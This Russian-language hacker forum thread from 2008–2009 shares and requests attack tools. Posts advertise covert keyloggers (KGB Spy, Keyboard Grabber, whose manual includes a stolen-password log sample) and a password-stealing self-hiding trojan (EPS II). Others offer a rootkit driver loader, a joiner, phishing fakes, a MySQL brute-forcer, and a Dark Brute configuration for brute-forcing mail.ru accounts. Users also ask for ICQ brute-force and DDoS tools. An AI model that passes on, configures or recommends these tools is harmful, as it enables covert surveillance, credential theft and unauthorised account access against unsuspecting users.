Очень удобный и понятный интерфейс
Удобный и понятный интерфейс
Мы постарались сделать интерфейс KGB Spy максимально удобным и понятным всем, даже начинающим компьютерным пользователям.
Перехват нажатых клавиш на клавиатуре
KGB Spy сохраняет в лог все клавиши, которые нажимает пользователь на клавиатуре
Запись снимков экрана (скриншотов)
KGB Spy записывает не только вводимую с клавиатуры информацию и данные из буфера обмена, но также делает снимки экрана (скриншоты)
Мониторинг буфера обмена
Одной из основных функциональных возможностей программы является наблюдение за содержанием информации в буфере обмена, с которым работает каждый без исключения пользователь компьютера
Мониторинг посещенных веб-сайтов
Сохранить банковский счет фирмы в положительном балансе, а Интернет-трафик в умеренном размере - разве это не мечта любого руководителя фирмы? Сделайте мечту реальностью с помощью KGB Spy, который даст полный отчет обо всех посещаемых пользователем сайтах. Кстати, это также и решение проблемы для родителей, которые переживают за содержание полученной из Интернета информации их чадом
Видимый/невидимый режим работы
Программа имеет два режима работы: видимый и невидимый. Причем если Вы выберите невидимый режим, то пользователи не заметят работы KGB Spy
Мониторинг запуска и закрытия программ
Каждый компьютер кроме установленной на нем операционной системы также имеет в своем арсенале достаточное количество программ, необходимых в работе. KGB Keylogger следит за запуском и закрытием программ. Эта функция может пригодиться как для выяснения причин каких-либо технических неполадок, так и для определения своевременности или несвоевременности использования того или иного программного приложения
Отслеживание включения/выключения/перезагрузки компьютера
В XXI веке компьютер стал неотъемлемой частью жизни и работы любого человека. Но в каждом механизме есть инструменты, контролировать функционирование которых очень сложно. KGB Spy отслеживает включение/выключение/перезагрузку компьютера и позволяет максимально оперативно следить за происходящими с машиной/машинами событиями
Полная мультипользовательская поддержка
Неважно сколько в вашей системе пользователей. KGB Spy может следить за отдельными, например, детьми или всеми
Уведомления на электронный ящик о наборе запрещенных слов
Если пользователь наберет сигнальное (запрещенное), то KGB Spy пометит эту запись в логе специальной меткой или отправит вам уведомление по электронной почте
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: shurabal 2.11.2008, 20:19
Цитата(draiver13 @ 2.10.2008, 21:21)

программка для декодирования телефонов по imei
если телефон заблокирован просто нажимаем в телефоне *#06# и переписываем из дисплея телефона в программу и генерируется код для разблокировки
http://depositfiles.com/files/8407047
Почему прога не запускается?
Автор: MYSTiQUE 11.11.2008, 17:21
Win32 SHELLCODE CONSTRUCTOR
от z0mbie
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: Gerzog 13.11.2008, 05:32
Цитата(DiZz3l @ 19.10.2008, 21:51)

Easy Rapidshare Points 3.0 Что то мне это вирус напоминает.
Вобщем, скачал, проверил NOD32-ом, распакавал, а програмульки то в папке не оказалось, хотя в архиве её видно и НОД не сработал...
Попробовал запустить прямо из архива а РАР мне и говорит: "А распаковывать то нечего"...
Вот я и говорю что мне эта програмка вирус напоминает, хотя может я чегонить не понимаю? Тогда прошу разъяснений или объяснений.
Автор: MYSTiQUE 13.11.2008, 11:15
А архив не SFX случайно......? Или обычный РАР?
Автор: MYSTiQUE 13.11.2008, 16:39
Троян EPS II
» Описание «
Пеpекомпелиpован с помощью VC++ 5.0 (файл меньше по pазмеpу).
- посылает месаги pаз в неделю.
- для вылоза в RING0 используется RING0 Dynamic VxD Manager
так, что тепеpь AWP (Advanced Windows Protector
http://awp.faithweb.com) остался на долго позади EPS II.
-скpывает свое тело.
умеет тепеpь воpовать паpоли от ICQ.
умеет пpиатачивать файлы.
REGVALCEXE добавлена к секции ATACHFILES.
RING0.VXD удаляется после использования.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: MYSTiQUE 13.11.2008, 17:15
Keyboard Grabber
не ругайте... Прога хоть и старовата, но работает отменно.. 
» Описание «
Keyboard Grabber 1.0 (KBG)
Описание:
---------
Программа является клавиатурным шпионом и ведет log всех нажатых
клавиш. Также в программе имеются функции:
1) обнаружения в окнах и "похищения" ***** - паролей;
2) блокировки клавиатуры для других программ.
3) перехват и запись содержимого буфера обмена в файл log'a
при нажатии комбинации Ctrl+v(вставка) при условии, что
буфер обмена содержит текстовую информацию.
KBG состоит из исполняемого модуля kbg.exe и библиотеки kbg.dll.
При первом запуске создает файл log'а с именем kbgrec.dll в системном
каталоге Windows (например: C:\Windows\System\kbgrec.dll). Этот файл
имеет текстовый формат и может быть просмотрен в любом текстовом
редакторе.(Файл доступен для чтения только при выключенной программе: KBG - Off)
Управление программой:
----------------------
Главное окно KBG имеет 4 кнопки:
1) On - включает программу;
2) Hide - прячет окно программы;
3) Off - выключает программу;
4) ------------------------------- - кнопка, открывающая/закрывающая панель
с опциями.
Опции:
------
1) Recording all keys - включает запись в log всех клавиатурных клавиш,
включая функциональные и управляющие;
2) Recording OEM keys - ведется запись только клавиш, имеющих отображение
на экране;
3) Creep (*****) passwords - включает функцию обнаружения в окнах и
"похищения" ***** - паролей;
4) Block keyboard - блокирует клавиатуру для других приложений;
5) Use Ctrl+ - добавляет необходимость нажатия Ctrl вместе с горячими
клавишами F10, F11, F12;
6) Run at system startup - автоматический запуск программы вместе с ОС;
7) Don't show on startup - программа стартует со скрытым окном.
8) Кнопка Registration in system - служит для сохранения установленных
пользователем опций в реестре Windows. После ее нажатия кнопка
видоизменяется в Unregistration in system и служит для удаления
записей KBG из реестра Windows.
Формат файла log'a:
-------------------
Файл log'a kbgrec.dll имеет следующий формат:
Пример 1:
[KBG 1.0] [Load in Sun Jul 01 11:22:14 2001]
-[WND(PRG)] [DISCo Commander 96(C:\PROGRAM FILES\DC\DC32.EXE)]
--[WND(CLS)] [none(OwlWindow)]
---[DOWNKEYS] [59483569834]
[KBG 1.0] [Exit in Sun Jul 01 12:38:03 2001]
здесь:
[KBG 1.0] - версия программы;
[Load in Sun Jul 01 11:22:14 2001] - дата и время старта;
-[WND(PRG)] [DISCo Commander 96(C:\PROGRAM FILES\DC\DC32.EXE)] -
-[WND(PRG)] [заголовок окна, в котором была нажата клавиша(имя файла программы)]
--[WND(CLS)] [none(OwlWindow)] -
--[WND(CLS)] [заголовок дочернего окна(если оно есть), в котором была нажата клавиша(имя класса окна)]
---[DOWNKEYS] [59483569834] -
---[DOWNKEYS] [нажатые клавиши или вставка из буфера обмена]
Пример 2:
[KBG 1.0] [Load in Sun Jul 01 11:22:14 2001]
-[WND(PRG)] [Установка связи(C:\WINDOWS\RUNDLL32.EXE)]
--[PASSWORD] [(*****) password: mtu]
[KBG 1.0] [Exit in Sun Jul 01 11:32:14 2001]
здесь:
[KBG 1.0] - версия программы;
[Load in Sun Jul 01 11:22:14 2001] - дата и время старта;
-[WND(PRG)] [Установка связи(C:\WINDOWS\RUNDLL32.EXE)] -
-[WND(PRG)] [заголовок окна, в котором была нажата клавиша(имя файла программы)]
--[PASSWORD] [(*****) password: mtu] -
--[PASSWORD] [(*****) password: "похищенный" пароль]
[KBG 1.0] - версия программы;
[Exit in Sun Jul 01 11:32:14 2001] - дата и время завершения программы.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Gerzog 13.11.2008, 18:26
Цитата(MYSTiQUE @ 13.11.2008, 12:15)

А архив не SFX случайно......? Или обычный РАР?
Дык обычный РАР, скачал с того самого линка в посте на Рапиду...
Автор: Rim 22.11.2008, 14:57
Cracker Utilities
Размер: 12,5Мб
» Описание «
Cracker Utilities - это набор инструментов для начинающего крекера.
Сборка включает в себя:
Отладчик: OllyDbg + плагины + на русском языке
Дизассемблер: W32dsm
Дампер: Task Explorer
Перестройщик импорта: Import Reconstructor, Revirgin
HEX-редактор: WinHex + на русском языке + с ключом
Декомпилятор ресурсов: Resource Hacker
Перестройщик ресурсов: Resource Binder
Генератор патчей: Diablo2oo2's Universal Patcher + на русском языке
Здесь имеются и вспомогательные инструменты: PEID, Quick unpack, File monitoring, Registry monitoring, OgreGUI, Autoruns,PE Optimizer v1.4
Сборка компактна, содержит только самые необходимые инструменты, а также содержит описания для каждого элемента в самом инсталляторе.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Rim 11.12.2008, 20:38
IEInspector HTTP Analyzer Full Edition v3.3.2.179
Интерфейс: Английский
Размер: 3,8Мб
ОС: Windows® 98/2000/XP/Vista

» Описание «
HTTP Analyzer – программа-сниффер, позволяющая вам производить мониторинг и захватывать HTTP/HTTPS трафик в реальном времени. Позволяет отслеживать и отображать широкий диапазон информации, включая заголовки, содержание, cookies, строки запросов, отправку данных, потоки запросов и ответов, перенаправление URL и многое другое. Программа дает возможность удобно просматривать потоковые запросы. Кроме этого, данная программа обеспечивает кэширование информации и очистку сессии, информацию о статусе HTTP кода и имеет несколько настроек по фильтрации. Программа доступна в двух версиях, в качестве отдельного полнофункционального приложения и в качестве дополнения для Internet Explorer. Кроме IE, программа поддерживает работу с браузерами Opera, Firefox и другими интернет-браузерами. Основные возможности программы сводятся к удобной отладке HTTP-запросов.
Возможности:
- Эффективный анализ и диагностика HTTP-трафика для веб-приложений
- Отладка веб-приложений
- Обнаружение узких мест и медленно работающих частей сетевых приложений
- Измерение скорости загрузки, размера содержимого и количества сетевых отправок
- Проверка веб-сайтов на безопасность
- Анализ интересующих вас веб-сайтов
- Помощь в изучении HTTP-протокола
- Повышение продуктивности веб-разработки
- Встроенный HEX-просмотрщик
- Построение HTTP-запросов
- Запись промежуточного HTTP/HTTPS трафика
- Выборочная очистка кэша и cookie
- Поддержка HTTP-сжатия
- Фильтрация данных в стиле MS Excel®
- Группирование данных
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Rim 26.12.2008, 17:04
Super Mail Spider v2.85
Интерфейс: Английский
Размер: 2.04Мб
ОС: Windows®
» Описание «
Super Email Spider - программа, которая разыскивает адреса электронной почты по всему интернету. Вы можете записать в строке поиска слово или фразу, по которой начнется поиск адресов. Поиск проходит по 22-ум популярным поисковым сайтам. Программа находит интернет-странички, соответствующие вашему запросу и извлекает из них адреса электронной почты, после чего вы можете извлечь эти адреса в текстовый файл. Программа сканирует все существующие домены и страницы любых видов, в том числе: HTML, PHP, CGI, ASP и др. Она может сканировать также скрытые страницы.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: MYSTiQUE 29.01.2009, 12:18
Rootkit-Driver-Loader
1 OSR Driver Loader is a program, which allows Windows Device Driver developers an easy way to register, unregister, start, and stop their Windows Device Driver.
2 Kernel Mode Driver Manager
Intended to make testing of Kernel Mode Drivers.
Installing, Starting, Stoping and Uninstalling.
3 Install Drv описание в архиве
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: MYSTiQUE 13.02.2009, 15:33
DSJoiner13
бинарник и исходники
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: ter10n 15.02.2009, 16:09
Dark Brute 0.9.1 - Хорошо настраиваемый двиг POST Запросов

Это демо версия поддерживает 5 потоков.
На 400 потоках + чекнутый прокси из паблика: 20-30ппс После обновления, по идее должно было стать больше, но измерять лень) , гуды вроде не пропускает.
+ Работает с прокси листом
+ Может работать и без прокси
+ В полной версии до 1700 потоков
- Пока в процессе отладки
- Оллидбг вам поможет добится максимум 1 лишнего потока, так что не старайтесь
в сорс.тхт кидайте login;password, для чека - инструкцию смотри
Ниже код для тех кто понимает пост запросы
Код
http://win.mail.ru/cgi-bin/auth? ////адрес скрипта
1 ////необходима ли доп. строка до логина
page=&post=&login_from= ////доп. строка до логина
Login= ////строка перед самим логином
1 ////необходима ли доп. строка после логина и до пароля
Domain=mail.ru ////доп. строка после логина и до пароля
Password= ////Строка перед самим логином
0 ////необходима ли доп. строка после пароля
////Раз нет то и не будем ее писать.
0 ////Метод: 0 - парсим ответ, 1 - 302 moved, 2 - 200 ок
53566 ////так как выше выбран 0 то нужно указать символ по которому смотрим гуд или не гуд
////тут пустая строка, ибо, например у маил.ру при плохом пароле нам показывают только форму ввода логина-пароля, а при удачном нам показываю весь интерфейс всего ящика, соответственно символ номер 53566 существует только у хорошего пароля, а у плохого символ под этим номером не существует => он равен ""
1 ////Allowredirect назначение следует из названия
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: MYSTiQUE 26.02.2009, 08:26
Сборка фэйков
примерно 70 фэйков.
размер - 2,66 мБ
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: MYSTiQUE 14.04.2009, 09:26
XND IP-Spoofing Local HTTP-Proxy 1.0
XND IP-Spoofing Local HTTP-Proxy
XND ISHP это программа, обеспечивающая вашу анонимность при использовании протокола
HTTP/1.x за счет внешних произвольных HTTP-прокси-серверов. Программа выполнена
в виде локального прокси-сервера, адрес которого необходимо указать в вашем
веб-браузере.
Размер архива - 26,2 кБ.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: MMETT 15.04.2009, 14:45
Цитата(Hroft_clone3 @ 3.06.2008, 18:11)

Народ, нужен последний Advanced Office Password Recovery от Elcomsofta, весь форум перерыл, живых линков не нашел :(
Пожалуйста подскажите новые ссылки на лекарство для Advanced Office Password Recovery 4, указанные ссылки пустые :(
Автор: MYSTiQUE 16.04.2009, 09:22
r57mysql_brute
маленький брутфорсер на С для MySQL
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: johnbryant 23.05.2009, 19:41
выложите пожалуйста программу для брута ICQ номеров
заранее спасибо.
Автор: DDoSmoToRm.tEam 27.05.2009, 21:08
Ребят,ищу программу ддосит через хабы т.е. посылка запросов идет , рубит мрачно . А то потерял я ее обыскался уже ... если есть у кого поделитесь пожалуйста.
Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)